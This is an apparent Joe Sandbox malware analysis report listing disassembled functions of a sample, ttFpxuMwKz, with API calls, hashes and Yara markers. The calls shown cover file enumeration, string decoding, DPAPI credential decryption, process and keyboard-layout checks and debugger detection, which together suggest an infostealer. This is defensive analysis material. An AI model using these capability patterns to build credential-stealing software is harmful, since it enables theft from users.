                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*$@
                                    • API String ID: 433455689-2355794846
                                    • Opcode ID: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                    • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                    • Opcode Fuzzy Hash: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                    • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                    Function 007E1937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 007E1B8A
                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 007E1BDA
                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 007E1BF0
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007E1FA7
                                    • DeleteFileA.KERNEL32(00000000), ref: 007E2031
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007E2087
                                    • FindClose.KERNEL32(000000FF), ref: 007E2099
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 1415058207-0
                                    • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                    • Instruction ID: 5643f5ad0212a76c91e28c0b79c6aa83928e19bacf5511a84a592301d8e816e3
                                    • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                    • Instruction Fuzzy Hash: B612B1B191121CEBCB19EB60DD6AEFD7379AF54300F408199B20A62291EF785F89CF51
                                    Function 007EE077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 007EE0C5
                                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 007EE115
                                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 007EE12B
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EE647
                                    • FindClose.KERNEL32(000000FF), ref: 007EE659
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2325840235-0
                                    • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                    • Instruction ID: 48fec98dbed3b9a664c7b26953941baa832ccd5cad23b88e2160f1c5e9185fc2
                                    • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                    • Instruction Fuzzy Hash: 0BF191B191421CEACB19EB60DDA9EFE7339AF14300F4045E9B14E62291DF386F89CE51
                                    Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                    • LocalFree.KERNEL32(00000000), ref: 00417D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                    • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                    • Opcode Fuzzy Hash: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                    • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                    Function 007ECA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 007ECABA
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007ECAD8
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007ECAE3
                                    • memcpy.MSVCRT(?,?,?), ref: 007ECB79
                                    • lstrcat.KERNEL32(?,00420B46), ref: 007ECBAA
                                    • lstrcat.KERNEL32(?,00420B47), ref: 007ECBBE
                                    • lstrcat.KERNEL32(?,00420B4E), ref: 007ECBDF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 1498829745-0
                                    • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                    • Instruction ID: 4fa49347a7e39cd37a8632338e2e8fc06907e80369b15df1cfb4f6de1538f460
                                    • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                    • Instruction Fuzzy Hash: 674182B8944219EFDB10DFD0DC89BFEBBB9BB48304F1045A8E509A6280D7745B84CF95
                                    Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 0040C853
                                    • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00A12E70), ref: 0040C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                    • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                    • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                    • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                    • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 1498829745-0
                                    • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                    • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                    • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                    • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                    Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00A12D90,?,0042110C,?,00000000,?), ref: 0041696C
                                    • sscanf.NTDLL ref: 00416999
                                    • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00A12D90,?,0042110C), ref: 004169B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00A12D90,?,0042110C), ref: 004169C0
                                    • ExitProcess.KERNEL32 ref: 004169DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID: B
                                    • API String ID: 2533653975-2248957098
                                    • Opcode ID: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                    • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                    • Opcode Fuzzy Hash: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                    • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                    Function 007F9107 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,S~,40000001,00000000,00000000,?,007E53EB), ref: 007F9127
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID: S~
                                    • API String ID: 80407269-3256534576
                                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                    • Instruction ID: d1fb573f6efb68a859a21cc0debf4c7c341ec110d8a81317800e7d5b023ea845
                                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                    • Instruction Fuzzy Hash: 9D11DA7420420DFFDB00CF94D889FB633AAAF89754F109568FA198B350D779E842DB60
                                    Function 007E9D27 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D56
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,007E5155,00000000,?), ref: 007E9D68
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,UQ~,00000000,00000000), ref: 007E9D91
                                    • LocalFree.KERNEL32(?,?,?,?,007E5155,00000000,?), ref: 007E9DA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: UQ~
                                    • API String ID: 4291131564-2167080295
                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction ID: 2a0c0e3469b292b3bb37d34abbb6204dccf7e7d99175001d8c1f2440c778cf81
                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction Fuzzy Hash: 1011A4B4241208BFEB10CFA4CC95FAA77B5EB89704F208058FE159B390C776A901CB90
                                    Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: N@
                                    • API String ID: 4291131564-4229412743
                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                    • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                    Function 007F7DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 007F7E48
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 007F7E60
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 007F7E74
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007F7EC9
                                    • LocalFree.KERNEL32(00000000), ref: 007F7F89
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID:
                                    • API String ID: 3090951853-0
                                    • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                    • Instruction ID: 72375882d8d3bb4f979f8fcbec3901640d6cb4a5c7ea8415c77a492cc154186c
                                    • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                    • Instruction Fuzzy Hash: 7E4109B195021CEBDB24DB94DC99BEDB3B5EB44700F204199E109A6291DB782F89CFA1
                                    Function 007FB5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 007FBE09
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007FBE1E
                                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 007FBE29
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 007FBE45
                                    • TerminateProcess.KERNEL32(00000000), ref: 007FBE4C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction ID: e0111645a40e5ac2e1eda15e64a54d8a1b641bee015c190751e0bf38f6ee24c2
                                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction Fuzzy Hash: 0C21A3BC900209DFDB14DF69F8896963BE4FB0A314F504039E90987365EBB45981EF49
                                    Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                    • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                    Function 007E74A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007E74B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E74BB
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E74E8
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007E750B
                                    • LocalFree.KERNEL32(?), ref: 007E7515
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                    • Instruction ID: 9b8927ce15ed102bb347bb3db5f16bfb77a69d55a00d99fec3ee346bc39ad6ce
                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                    • Instruction Fuzzy Hash: 17010075A80208BBEB14DFD4DD45F9D77B9EB48704F104155F705AA2C0D674AA008B65
                                    Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                    • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 3657800372-0
                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                    • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                    • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                    Function 007F9867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F9885
                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 007F9899
                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 007F98AE
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 007F98C3
                                    • CloseHandle.KERNEL32(00420ACA), ref: 007F98E1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                    • Instruction ID: 1442d757b748bda99827b2d75a6849f797445000b2f8db3ddd4587cc98687cd5
                                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                    • Instruction Fuzzy Hash: 21010C79A5020CFFDB20DFE4CD54BEDB7F9EB49740F104189A605A6240D7789A44DF51
                                    Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                    • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
